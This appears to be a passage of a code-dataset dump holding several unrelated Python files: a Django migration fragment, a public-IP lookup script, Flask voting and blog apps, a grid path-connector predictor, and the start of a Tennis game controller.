),\n migrations.CreateModel(\n name='WordAmigo',\n fields=[\n ('word_amigo_pk', models.AutoField(primary_key=True, serialize=False)),\n ('usuario', models.ForeignKey(db_column='usuario_fk', related_name='usuario', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT)),\n ('word', models.ForeignKey(db_column='word_fk', related_name='word', to='thomas.Word', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'word_amigo',\n },\n ),\n migrations.AddField(\n model_name='rol',\n name='usuarios',\n field=models.ManyToManyField(to='thomas.Usuario', through='thomas.UsuarioRol'),\n ),\n migrations.AddField(\n model_name='amigo',\n name='usuarioReceptor',\n field=models.ForeignKey(db_column='usu_receptor_fk', related_name='usuarioReceptor', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT),\n ),\n migrations.AddField(\n model_name='amigo',\n 
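# requesting side of the self-referential friendship pair\n            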
name='usuarioSolicitante',\n field=models.ForeignKey(db_column='usu_solicitante_fk', related_name='usuarioSolicitante', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT),\n ),\n ]\n","sub_path":"thomas/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650427392","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n#\n# File: WhatIsMyIp.py\n# Auth: Mattia Oss \n# Date: Sun, 23 Mar 2008 18:12:26 +0100\n\n# print urllib2.urlopen(\"http://www.whatismyip.com/\").read()\n\n# from urllib.request import urlopen\n# for line in urlopen('http://www.whatismyip.com/'):\n # line = line.decode('utf-8') # Decoding the binary data to text.\n # print(line)\n\ndef old():\n\n from urllib.request import Request, urlopen\n\n req = Request('http://www.whatismyip.com/', headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n print(webpage)\n\n with open('/home/mattia/mydata/python/scripts/files/What-is-my-ip.org.py/webpage','r') as f:\n webpage = f.read()\n\nfrom urllib.request import Request, urlopen\nimport re\ndef getPublicIp():\n data = str(urlopen('http://checkip.dyndns.com/').read())\n # data = 'Current IP CheckCurrent IP Address: 65.96.168.198\\r\\n'\n\n return re.compile(r'Address: (\\d+\\.\\d+\\.\\d+\\.\\d+)').search(data).group(1)\n\nprint(getPublicIp())\n","sub_path":"WhatIsMyIp.py","file_name":"WhatIsMyIp.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389773022","text":"# load env vars\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nfrom flask import Flask, request, make_response, jsonify\n\nimport bot\n\napp = Flask(__name__)\n\n\n@app.route('/votes')\ndef get_votes():\n if bot.is_voting():\n response = make_response(jsonify(data={\n \"title\": bot.get_question(),\n \"votes\": list(bot.get_votes().values()),\n \"labels\": list(bot.get_votes().keys())\n }), 200)\n else:\n response = make_response(jsonify(data={\n \"title\": \"No ongoing poll!\",\n \"votes\": [],\n \"labels\": []\n }), 200)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n\n@app.route('/vote', methods=['POST'])\ndef start_vote():\n body = request.json\n print(body)\n bot.start_voting(body['opts'], body['phrase'])\n return make_response(jsonify(success=True), 200)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', ssl_context='adhoc')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323636185","text":"# blog.py\n\nfrom flask import Flask, request, redirect, \\\n\t\t\t\t url_for, render_template, \\\n\t\t\t\t Blueprint, flash\nfrom markdown import markdown\n\nimport db\nimport auth\nfrom flask_login import current_user, login_required\n\nblog = Blueprint('blog', __name__,\n template_folder='templates',\n url_prefix='/blog')\nblogs = db.table('blog')\n\n@blog.route('/')\ndef main():\n blogid = request.args.get(\"id\")\n if blogid and blogid.isalnum() and current_user.is_authenticated:\n if not blogid in blogs:\n can_edit = set(filter(\"\".__ne__,\n request.args.get(\"edit\", \"\").split(\" \")))\n\n can_view = set(filter(\"\".__ne__,\n request.args.get(\"view\", \"\").split(\" \"))).union(can_edit)\n\n can_edit.add(\"@\" + current_user.name)\n blogs[blogid] = {\n \"text\": 
\"\",\n \"id\": blogid,\n \"author\": current_user.name,\n \"access_policy\": {\n \"view\": list(can_view),\n \"edit\": list(can_edit)\n }\n }\n blogs.commit()\n return redirect(url_for(\"blog.edit\", id=blogid))\n else:\n return render_template('blog.html', blogs=blogs)\n\n@blog.route('/edit')\ndef edit():\n blogid = request.args.get('id')\n if blogid == None:\n return redirect(url_for('blog.main'))\n \n user_can = auth.rights(current_user, blogs[blogid][\"access_policy\"])\n \n if blogid in blogs and user_can[\"edit\"]:\n if request.args.get(\"action\") == \"view\":\n blogs[blogid][\"text\"] = request.args.get(\"text\")\n blogs.commit()\n return redirect(url_for(\"blog.view\", id=blogid))\n elif request.args.get(\"action\") == \"save\":\n blogs[blogid][\"text\"] = request.args.get(\"text\")\n blogs.commit()\n return redirect(url_for(\"blog.edit\", id=blogid))\n else:\n return render_template(\n 'edit_blog.html',\n blog=blogs[blogid])\n else:\n return redirect(url_for(\"blog.main\"))\n\n@blog.route('/view', methods=['GET'])\ndef view():\n blogid = request.args.get(\"id\")\n\n if blogid in blogs:\n blogg = blogs[blogid]\n print(\"user:\",current_user)\n user_can = auth.rights(current_user, blogg[\"access_policy\"])\n if user_can[\"view\"]:\n content = markdown(blogs[blogid][\"text\"],\n extensions=[\"tables\"])\n edit_button = \"\"\"
<form action=\"edit\" method=\"get\">\n            <input type=\"hidden\" name=\"id\" value=\"{}\"/>\n            <input type=\"submit\" value=\"Edit\"/>\n            </form>\n
\"\"\".format(blogid)\n head = \"\"\"\n \n \n Blog {}\n \n \n \"\"\".format(blogid)\n tail = \"\"\n if user_can[\"edit\"]:\n return head + content + edit_button + tail\n else:\n return head + content + tail\n else:\n return redirect(url_for('blog.main'))\n else:\n return redirect(url_for('blog.main'))\n","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"556848335","text":"import numpy as np\nfrom collections import OrderedDict\nfrom itertools import product\n\nfrom predictors.basic import *\n\nfrom base.field import *\nfrom base.iodata import *\nfrom utils import *\nfrom constants import *\n\n\nclass Colorizer():\n def __init__(self):\n self.colors = []\n #self.position = 0\n self.info = []\n self.path=None\n self.start_color = None\n\n def copy(self):\n newc = Colorizer()\n newc.colors = self.colors.copy()\n newc.info = self.info.copy()\n newc.path = self.path\n newc.start_color = self.start_color\n return newc\n\n def add_start_color(self, start, color):\n self.start_color = (start, color)\n\n def add_color(self, move, color):\n self.colors.append(color)\n self.info.append((move))\n \n def change_palette(self, start):\n #print(start)\n return self\n if len(self.colors) == 0:\n return self\n newc = Colorizer()\n newc.path = self.path\n h, w = self.path.start.shape\n if self.path.start[h//2, w//2] == self.colors[0]:\n colormap = {xo: xi for lo, li in zip(self.path.start, start)\n for xo, xi in zip(lo, li)}\n newc.colors = [ colormap.get(c, c) for c in self.colors]\n return newc\n return self\n\n def __iter__(self):\n if self.path.dx == 0 and self.path.dy == 0:\n while True:\n yield self.start_color[1]\n return\n position = 0\n if len(self.colors) == 0:\n raise StopIteration\n while True:\n yield self.colors[position]\n position = (position + 1) % len(self.colors)\n def __repr__(self):\n return str(self.colors)\n \n\nclass PathDescription:\n def __init__(self, x, y, dx, dy):\n self.x = x\n self.y = y\n self.dx = dx\n self.dy = dy\n self.start = None\n self.moves = []\n self.turn_conditions = []\n self.stop_conditions = []\n #self.total_length = 0\n self.positions = []\n self.rem = None\n self.colorizer = Colorizer()\n self.colorizer.path = self\n self.end = None\n \n def __eq__(self, o):\n if not (self.dx == o.dx and self.dy == o.dy):\n return False\n if self.start is not None and o.start is None:\n return False\n if self.start is None and o.start is not None:\n return False\n if self.start is None and o.start is None:\n return True\n if np.any(self.start != o.start):\n return False\n if set([tuple(m.flatten()) for m in self.moves])!= set([tuple(m.flatten()) for m in o.moves]):\n return False\n if (self.end is None) != (o.end is None):\n return False\n if self.end is not None:\n if np.any(self.end != o.end):\n return False\n if self.rem is None and o.rem is not None:\n return False\n if self.rem is not None and o.rem is None:\n return False\n if self.rem is None:\n return True\n return self.rem == o.rem\n return True\n \n def score(self):\n if self.rem is None:\n return len(self.positions)\n return len(self.positions) + self.rem.score()\n\n def merge(self, p):\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves + p.moves\n new_path.start = self.start\n new_path.end = p.end\n new_path.turn_conditions = self.turn_conditions + p.turn_conditions\n new_path.turn_conditions += [(self.end, p.dx, p.dy)]\n 
new_path.stop_conditions = self.stop_conditions + p.stop_conditions + [self.end]\n #new_path = self.total_length+ p.total_length\n new_path.positions = self.positions + p.positions\n return new_path\n\n def get_nsegments(self):\n if self.rem is None:\n return 1\n return 1+self.rem.get_nsegments()\n\n def flat_positions(self):\n if self.dx == 0 and self.dy ==0:\n return [(self.x, self.y)]\n if self.rem is None:\n return self.positions\n return self.positions + self.rem.flat_positions()\n\n def copy(self):\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves\n new_path.start = self.start\n new_path.end = self.end\n new_path.turn_conditions = self.turn_conditions #+ p.turn_conditions\n #new_path.turn_conditions += [(self.end, p.dx, p.dy)]\n new_path.stop_conditions = self.stop_conditions #+ p.stop_conditions + [self.end]\n #new_path = self.total_length+ p.total_length\n new_path.positions = self.positions # + p.positions\n new_path.colorizer = self.colorizer.copy()\n new_path.colorizer.path = new_path\n return new_path\n \n def add_path(self, p):\n new_path = self.copy()\n new_path.rem = p.copy()\n return new_path\n \n def add_paths(self, paths):\n for p in paths:\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves + p.moves\n new_path.turn_conditions = self.turn_conditions + p.turn_conditions\n new_path.stop_conditions = self.stop_conditions + p.stop_conditions\n #new_path = self.total_length+ p.total_length\n p.positions = self.positions + p.positions\n yield p\n\n def get_last_pos(self):\n if self.rem is None:\n x, y = ([(self.x, self.y)] + self.positions)[-1]\n else:\n print(\"rem is not None\")\n print(self.rem)\n x, y = self.rem.get_last_pos()\n return x, y\n\n def __repr__(self):\n x, y = ([(self.x, self.y)] + self.positions)[-1]\n path_line = f\"Path of {len(self.positions)} steps from {(self.x, self.y)} to {(x, y)} ({self.positions}), {self.dx, self.dy}\"\n if self.rem is None:\n return path_line\n path_line+= \"\\n->\\n\"+str(self.rem)\n return path_line\n\n\nclass StopConditions:\n def __init__(self):\n self.info = OrderedDict()\n pass\n def add(self, dx, dy, cell):\n if not (dx, dy) in self.info:\n self.info[(dx, dy)] = set()\n self.info[(dx, dy)].add(tuple(cell.flatten()))\n def add_square(self, cell):\n for dx, dy in product([-1, 0, 1], [-1, 0, 1]):\n if dx == 0 and dy==0:\n continue\n self.add(dx, dy, cell)\n\n def is_stop(self, dx, dy, cell):\n if not (dx, dy) in self.info:\n return False\n i = tuple(cell.flatten())\n return i in self.info[(dx, dy)]\n def __repr__(self):\n return str(self.info)\n\n\n\nclass PathCollection:\n def __init__(self, paths):\n self.collection = OrderedDict()\n #self.kernel_size = kernel_size\n #self.hwkernel = 2*kernel_size + 1\n for p in paths:\n self.add_path(p)\n pass\n\n def add_path(self, path):\n start = tuple(path.start.flatten())\n if not start in self.collection:\n self.collection[start] = []\n if not path in self.collection[start]:\n #print(\"path already present\", str(path))\n self.collection[start].append(path)\n\n def __repr__(self):\n result = []\n for k in self.collection:\n size = int(np.sqrt(len(k)))\n result.append(f\"{np.asarray(list(k)).reshape(size, -1)}\")\n for p in self.collection[k]:\n result.append(f\" {str(p)}\")\n\n moves = \"\\n->\\n\".join([str(move) for move in p.moves ])\n result.append(moves)\n result.append(str(p.end))\n return \"\\n\".join(result)\n \n @classmethod\n def build(cls, paths):\n path_collection = cls(paths)\n return 
path_collection\n\n\nclass PointConnectorUtils:\n @staticmethod\n def get_conditions(inp, out, sx, sy, dx, dy,\n stop_conditions=StopConditions(),\n kernel_size=1, debug=False):\n inp_ = np.pad(inp, kernel_size, constant_values=-1).copy()\n out_ = np.pad(out, kernel_size, constant_values=-1).copy()\n hwkernel = 2*kernel_size + 1\n if inp_[sx + kernel_size + dx, sy + kernel_size + dy] == out_[sx + kernel_size + dx, sy + kernel_size + dy]:\n return None\n if inp_[sx + kernel_size + dx, sy + kernel_size + dy] not in np.arange(10):\n if debug:\n print(inp_[sx + kernel_size + dx, sy + kernel_size + dy])\n return None\n path = PathDescription(sx, sy, dx, dy)\n path.start = inp_[sx : sx + hwkernel, sy : sy + hwkernel].copy()\n path.colorizer.add_start_color(inp_[sx + kernel_size, sy + kernel_size], out_[sx + kernel_size, sy + kernel_size])\n if stop_conditions.is_stop(dx, dy, path.start):\n return None\n # moves = []\n # positions = []\n # turn_conditions = []\n # stop_conditions = []\n x = sx\n y = sy\n for step in range(100):\n x += dx\n y += dy\n #print(dx, dy, inp_[x + kernel_size, y + kernel_size])\n if (inp_[x + kernel_size, y + kernel_size] != 10 and \\\n inp_[x + kernel_size, y + kernel_size] != out_[x + kernel_size, y + kernel_size]):\n path.positions.append((x, y))\n else:\n break\n if len(path.positions) == 0:\n #stop_conditions.add(dx, dy, path.start)\n return None\n # path.stop_conditions.append(inp_[sx:sx + hwkernel, sy: sy + hwkernel].copy())\n # return path, inp_, out_\n for k, (x, y) in enumerate(path.positions):\n move = inp_[x : x + hwkernel, y : y + hwkernel].copy()\n if inp_[x + kernel_size, y + kernel_size] == 10:\n return None\n color = out_[x + kernel_size, y + kernel_size]\n path.colorizer.add_color(move, color)\n path.moves.append(move)\n inp_[x + kernel_size, y + kernel_size] = 10\n path.end = inp_[x: x + hwkernel, y:y + hwkernel].copy()\n #stop_conditions.add(dx, dy, path.end)\n path.moves = OrderedDict.fromkeys([tuple(m.flatten()) for m in path.moves])\n path.moves = [np.asarray(list(m)).reshape(hwkernel, hwkernel) for m in path.moves]\n # for dx_, dy_ in product([-1, 0, 1], [-1, 0, 1]):\n # if dx_ == -dx and dy_ == -dy:\n # continue\n # if dx_ == 0 and dy_ == 0:\n # continue\n # new_direction = get_conditions(inp_[1:-1], out_[1:-1], x, y, dx_, dy_)\n return path, \\\n inp_[kernel_size : -kernel_size, kernel_size : -kernel_size], \\\n out_[kernel_size : -kernel_size, kernel_size : -kernel_size]\n\n @staticmethod\n def filter_paths(res):\n #r = [x for x in res]\n allpos = OrderedDict()\n for k, (score, (p, i, o)) in enumerate(res):\n if p.dx == 0 and p.dy==0:\n positions = [(p.x, p.y)]\n else:\n positions = p.positions\n for pos in positions:\n if not pos in allpos:\n allpos[pos] = [k]\n else:\n l = allpos[pos][0]\n if res[l][0] == score:\n allpos[pos].append(k)\n elif res[l][0] < score:\n allpos[pos] = [k]\n paths = set([x for xs in allpos.values() for x in xs])\n return [res[k] for k in paths]\n\n \n @staticmethod\n def filter_by_segments(res):\n allpos = OrderedDict()\n for k, (score, (p, i, o)) in enumerate(res):\n pos = tuple(sorted(set(p.flat_positions())))\n if pos not in allpos:\n allpos[pos] = []\n n = (p.get_nsegments(), k)\n allpos[pos].append(n)\n for k in allpos:\n nseg = min([x[0] for x in allpos[k]])\n allpos[k] = [v for u, v in allpos[k] if u == nseg]\n \n return [res[k] for ks in allpos.values() for k in ks]\n\n\n @classmethod\n def get_point_changes(cls, inp, out, x, y,\n stop_conditions=StopConditions(), kernel_size=1, debug=False):\n inp_ = 
np.pad(inp, kernel_size, constant_values=-1).copy()\n out_ = np.pad(out, kernel_size, constant_values=-1).copy()\n hwkernel = 2 * kernel_size + 1\n start = inp_[x : x + hwkernel, y : y + hwkernel]\n start_out = out_[x : x + hwkernel, y : y + hwkernel]\n if np.all(start == start_out):\n return None\n for i in range(0, start.shape[0]):\n for j in range(0, start.shape[1]):\n if i == kernel_size and j == kernel_size:\n continue\n if start[i, j] != start_out[i, j]:\n return None\n path = PathDescription(x, y, 0, 0)\n path.start = inp_[x : x + hwkernel, y : y + hwkernel].copy()\n path.end = out_[x : x + hwkernel, y : y + hwkernel].copy()\n path.colorizer.add_start_color(inp_[x + kernel_size, y + kernel_size], out_[x + kernel_size, y + kernel_size])\n inp_[x + kernel_size, y + kernel_size] = 10\n return 0, (path, inp_[kernel_size:-kernel_size], out_[kernel_size:-kernel_size])\n \n \n @classmethod\n def get_paths_from_point(cls, inp, out, x, y, last_dx=0, last_dy=0,\n stop_conditions=StopConditions(), kernel_size=1, debug=False, recursive=False):\n if debug:\n print(\"get_path_from_point call\")\n #print(inp, out)\n print(x, y, last_dx, last_dy)\n #if inp[x, y] not in np.arange(10):\n # return []\n scores = []\n for dx, dy in product([-1, 0, 1], [-1, 0, 1]):\n if dx == 0 and dy == 0:\n continue\n if dx == last_dx and dy == last_dy:\n continue\n if dx == -last_dx and dy == -last_dy:\n continue\n res = cls.get_conditions(inp, out, x, y, dx, dy, stop_conditions=stop_conditions,\n kernel_size=kernel_size, debug=debug)\n if debug:\n print(x, y, last_dx, last_dy, dx, dy, res)\n #path, inp, out = res\n if res is None:\n continue\n if res is not None:\n path, inp_, out_ = res\n score = path.score()\n #print(\"score\", score)\n #if score==1:\n # print(inp, inp_)\n #if last_dx == 0 and last_dy == 0 and score == 1 and recursive:\n # continue\n scores.append((score, (path, inp_, out_)))\n # if len(scores) < 1:\n # return []\n # max_score = max([s for s, _ in scores])\n # if max_score > 1 and last_dx == 0 and last_dy == 0:\n # scores = [(s, _) for s, _ in scores if s > 1]\n # \n all_scores = cls.filter_paths(scores)\n if not recursive:\n return all_scores\n result = []\n \n for score, (p, i, o) in all_scores:\n x_, y_ = p.get_last_pos()\n continuations = cls.get_paths_from_point(\n i, o, x_, y_,\n last_dx=p.dx, last_dy=p.dy, \n stop_conditions=stop_conditions,\n kernel_size=kernel_size,\n debug=debug,\n recursive=True\n )\n #print(\"continuations\", x_, y_, len(continuations))\n if debug:\n print(\"continuation\", x_, y_, continuations)\n if len(continuations) == 0:\n result.append((score, (p, i, o)))\n else:\n for sc, (p_, i_, o_) in continuations:\n new_path = p.add_path(p_)\n result.append((new_path.score(), (new_path, i_, o_)))\n return result\n \n @classmethod\n def find_direction(cls, inp, out, stop_conditions=StopConditions(), kernel_size=1, debug=False,\n use_recursive_lines=True):\n all_scores = []\n for i in range(inp.shape[0]):\n for j in range(out.shape[1]):\n best_scores = cls.get_paths_from_point(\n inp, out, i, j, last_dx=0, last_dy=0,\n stop_conditions=stop_conditions, kernel_size=kernel_size,\n debug=debug, recursive=use_recursive_lines)\n res = cls.get_point_changes(inp, out, i, j, kernel_size=kernel_size)\n if res is not None:\n all_scores.append(res)\n best_scores = sorted(best_scores, key=lambda x:x[0], reverse=True)\n if len(best_scores) == 0:\n continue\n #print(best_scores)\n #max_score = best_scores[0][0]\n all_scores.extend(best_scores)#[x for x in best_scores if x[0] ==max_score])\n 
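# no candidate path was found anywhere on the grid, so report failure\n        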
if len(all_scores) == 0:\n return None\n #all_scores = cls.filter_paths(all_scores)\n #all_scores = cls.filter_by_segments(all_scores)\n return sorted(all_scores, key=lambda x:x[0], reverse=True)\n \n @staticmethod\n def compare_recolored(a, b):\n ab = dict()\n ba = dict()\n for k, v in zip(a.flatten(), b.flatten()):\n if k in ab:\n return False\n else:\n ab[k] = v\n if v in ba:\n return False\n else:\n ba[v] = k\n return True\n\n @classmethod\n def get_path_from_pos(cls, inp_, path, sx, sy, kernel_size=1):\n i = inp_.copy()\n hwkernel = 2*kernel_size + 1\n start = tuple(i[sx : sx + hwkernel, sy : sy + hwkernel].flatten())\n path_start = tuple(path.start.flatten())\n #todo: add colorizer\n if path_start != start and not cls.compare_recolored(path.start, i[sx : sx + hwkernel, sy : sy + hwkernel]):\n #print(path_start, start)\n return None\n x = sx\n y = sy\n positions = []\n flat_moves = [tuple(m.flatten())for m in path.moves]\n for k in range(100):\n x += path.dx\n y += path.dy\n if x < 0 or y < 0 or x > i.shape[0] - hwkernel or y > i.shape[1] - hwkernel:\n break\n move = i[x:x + hwkernel, y:y + hwkernel]\n flat_move = tuple(move.flatten())\n if flat_move in flat_moves: #or move[1 + path.dx, 1 + path.dy] in [\n #m[1 + path.dx, 1 + path.dy] for m in path.moves]:\n positions.append((x, y))\n i[x + kernel_size, y + kernel_size] = 10\n #print(k, move, flat_moves)\n else:\n #print(k, move)#, flat_moves)\n break\n # check path.end\n x, y = ([(sx, sy)] + positions)[-1]\n end = tuple(i[x : x + hwkernel, y : y + hwkernel].flatten())\n path_end = tuple(path.end.flatten())\n if end != path_end:\n return None\n return positions\n\n @classmethod \n def apply_path(cls, inp_, paths, kernel_size=1):\n data = OrderedDict()\n ext = OrderedDict()\n hwkernel = 2 * kernel_size + 1\n for i in range(inp_.shape[0] - hwkernel):\n for j in range(inp_.shape[1] - hwkernel):\n key = tuple(inp_[i : i + hwkernel, j : j + hwkernel].flatten())\n ext[(i, j)] = inp_[i : i + hwkernel, j : j + hwkernel]\n if not key in data:\n data[key] = []\n data[key].append((i, j))\n #print(data)\n all_paths = set()\n for p in paths:\n start = (tuple(p.start.flatten()))\n if not start in data:\n continue\n for x, y in data[start]:\n start = inp_[x : x + hwkernel, y : y + hwkernel]\n res = cls.get_path_from_pos(inp_, p, x, y, kernel_size=kernel_size)\n if res is not None:\n all_paths.add((tuple(sorted(res)), p.colorizer.change_palette(start)))\n return all_paths\n\n @classmethod\n def apply_pathc(cls, inp_, paths, kernel_size=1):\n data = OrderedDict()\n ext = OrderedDict()\n hwkernel = 2 * kernel_size + 1\n for i in range(inp_.shape[0] - hwkernel):\n for j in range(inp_.shape[1] - hwkernel):\n key = tuple(inp_[i : i + hwkernel, j : j + hwkernel].flatten())\n ext[(i, j)] = inp_[i : i + hwkernel, j : j + hwkernel]\n if not key in data:\n data[key] = []\n data[key].append((i, j))\n #print(data)\n all_paths = set()\n for start in paths.collection:\n if not start in data:\n continue\n for p in paths.collection[start]:\n #print(start)\n for x, y in data[start]:\n start_ = inp_[x : x + hwkernel, y : y + hwkernel]\n res = cls.get_path_from_pos(inp_, p, x, y, kernel_size=kernel_size)\n #print(res)\n if res is not None:\n all_paths.add((tuple(sorted(res)), p.colorizer))#.change_palette(start_)))\n return all_paths\n\n @classmethod\n def validate(cls, paths, iodata_list, kernel_size=1):\n for iodata in iodata_list:\n i = iodata.input_field.data\n o = iodata.output_field.data\n inp_ = np.pad(i, kernel_size, constant_values=-1).copy()\n out_ = 
np.pad(o, kernel_size, constant_values=-1).copy()\n\n filled_paths = cls.apply_pathc(inp_, paths, kernel_size=kernel_size)\n #print(filled_paths)\n res = np.zeros(i.shape, dtype=int)\n for path, colorizer in filled_paths:\n for (x, y) in path:\n res[x, y] = 1\n if not np.all((o)*(1 - res)==i):\n return False\n return True\n\n @classmethod\n def predict(cls, paths, field, kernel_size=1):\n inp = field.data.copy()\n inp_ = np.pad(inp, kernel_size, constant_values=-1).copy()\n filled_paths = cls.apply_pathc(inp_, paths, kernel_size=kernel_size)\n #print(filled_paths)\n #res = #np.zeros(i.shape, dtype=int)\n for path, colorizer in filled_paths:\n for (x, y), c in zip(path, colorizer):\n inp[x, y] = c\n return inp\n\n @classmethod\n def extract_paths(cls, iodata_list, kernel_size=1, debug=False, use_recursive_lines=True):\n result = []\n for iodata in iodata_list:\n i = iodata.input_field.data\n o = iodata.output_field.data\n if debug:\n print(\"==\"*19)\n stop_conditions = StopConditions()\n res = cls.find_direction(i, o, kernel_size=kernel_size, debug=debug,\n use_recursive_lines=use_recursive_lines)\n #print(\"extract_\", res)\n if res is None:\n if debug:\n print(None)\n continue\n res = cls.filter_paths(res)\n for score, (path, inp_, out_) in res:\n result.append((score, (path, inp_, out_)))\n if debug:\n if score == 0:\n continue\n print(score)\n print(path)\n print(inp_)\n print(out_)\n return result\n\n @classmethod\n def make_path_collection(cls, iodata_list, kernel_size=1, debug=False, use_recursive_lines=True):\n result = cls.extract_paths(iodata_list, kernel_size=kernel_size,\n debug=debug, use_recursive_lines=use_recursive_lines)\n paths = [p for (score, (p, i, o)) in result]\n #print(paths)\n pc = PathCollection.build(paths)\n return pc\n\n\nclass PointConnectorPredictor(Predictor, AvailableAll):\n def __init__(self, multiplier=1, kernel_size=1, debug=False, use_recursive_lines=False):\n self.multiplier = multiplier\n self.kernel_size = 1\n self.debug = debug\n self.use_recursive_lines = use_recursive_lines\n\n def is_available(self, iodata_list):\n for k, iodata in enumerate(iodata_list):\n if iodata.input_field.shape != iodata.output_field.shape:\n return False\n self.path_collection = PointConnectorUtils.make_path_collection(\n iodata_list, kernel_size=self.kernel_size, debug=self.debug,\n use_recursive_lines=self.use_recursive_lines)\n if self.debug:\n print(self.path_collection)\n return PointConnectorUtils.validate(\n self.path_collection, iodata_list, kernel_size=self.kernel_size)\n \n def train(self, iodata_list):\n pass\n\n def predict(self, field):\n if isinstance(field, IOData):\n for v in self.predict(field.input_field):\n yield v\n return\n result = PointConnectorUtils.predict(self.path_collection, field,\n kernel_size=self.kernel_size)\n #while True:\n yield Field(result)\n\n def __str__(self):\n return f\"PointConnectorPredictor()\"\n","sub_path":"predictors/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":25186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365848283","text":"#*************************************************************************************\r\n#\r\n# FILENAME : Tennis_Controller.py\r\n#\r\n# SOURCE : Kata Task\r\n#\r\n# COPYRIGHT :(C) GW\r\n#\r\n#************************************************************************************\r\n#\r\n# DESCRIPTION:\r\n# \r\n#\tTennis_Controller.py is the entry point to the application.\r\n# The class 
Tennis_Application_Controller controls program flow taking requests from view classes, \r\n# populating models, and utilising service classes where applicable\r\n#\t\r\n#*************************************************************************************\r\n\r\n\r\n# Imports : \r\nfrom Tennis_View import View_Capability_Handler\r\nfrom Tennis_Model import Tennis_Player_Model\r\nfrom Tennis_Services import Tennis_Model_Services\r\n\r\n# Class controlling program flow\r\nclass Tennis_Application_Controller():\r\n\t\r\n\tdef __init__(self):\r\n\t\r\n\t\t# Init views\r\n\t\tself.view_capability_handler_instance = View_Capability_Handler(self)\r\n\t\t# Activate views\r\n\t\tself.view_capability_handler_instance.start_view()\r\n\t\t# Init services capabilities\r\n\t\tself.tennis_model_services_instance = Tennis_Model_Services()\r\n\t\t# Attribute to store all models created\r\n\t\tself.player_models_dictionary = {}\r\n\t\t\r\n\t# Method which acceses all views from handler and displays the requested view\r\n\tdef request_frame(self, cont):\r\n\t\t# Set attribute to new current view\r\n\t\tself.active_view = cont\r\n\t\t# Get requested view from handler\r\n\t\tframe = self.view_capability_handler_instance.get_all_views()[cont]\r\n\t\t# Make view \"active\"\r\n\t\tframe.tkraise()\r\n\t\r\n\t# Method which kills root object and thus all views\r\n\tdef request_view_termination(self):\r\n\t\tself.view_capability_handler_instance.get_view_root_object().quit()\r\n\t\r\n\t# Method which calls view to provide its data payload and populates the player models\r\n\tdef request_player_model_population(self, cont, main_tennis_view):\r\n\t\t# Get data payload\r\n\t\tpay_load = self.view_capability_handler_instance.get_all_views()[cont].get_view_payload()\r\n\t\t# For each player...\r\n\t\tfor index, player_name in enumerate(pay_load[\"player_name\"]):\r\n\t\t\t# Create and populate model\r\n\t\t\ttennis_player_model_instance = Tennis_Player_Model()\r\n\t\t\ttennis_player_model_instance.set_player_name(pay_load[\"player_name\"][index])\r\n\t\t\ttennis_player_model_instance.set_up_movement_key(pay_load[\"up_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_down_movement_key(pay_load[\"down_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_left_movement_key(pay_load[\"left_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_right_movement_key(pay_load[\"right_movement_key\"][index])\r\n\t\t\ttennis_player_model_instance.set_player_id(index)\r\n\t\t\ttennis_player_model_instance.set_player_color(pay_load[\"player_color\"][index])\r\n\t\t\t# Use service to check if model is indeed valid\r\n\t\t\tif(self.tennis_model_services_instance.validate_player_model(tennis_player_model_instance) == True):\r\n\t\t\t\t# Model valid assign to member attribute\r\n\t\t\t\tplayer_model_dictionary_element = {pay_load[\"player_name\"][index] : tennis_player_model_instance}\r\n\t\t\t\tself.player_models_dictionary.update(player_model_dictionary_element)\r\n\t\t\telse:\r\n\t\t\t\t# Model invalid display error to user and exit method\r\n\t\t\t\tself.view_capability_handler_instance.ammend_error_to_frame(cont, self.tennis_model_services_instance.return_error_message())\r\n\t\t\t\treturn\r\n\t\t# Valid model show next frame\r\n\t\tself.request_frame(main_tennis_view)\r\n\t\t# Create player on next frame\r\n\t\tself.player_creation(cont, main_tennis_view)\r\n\t\r\n\t# Method which creates player on canvas\r\n\tdef player_creation(self, cont, main_tennis_view):\r\n\t\tfor index, player_model in 
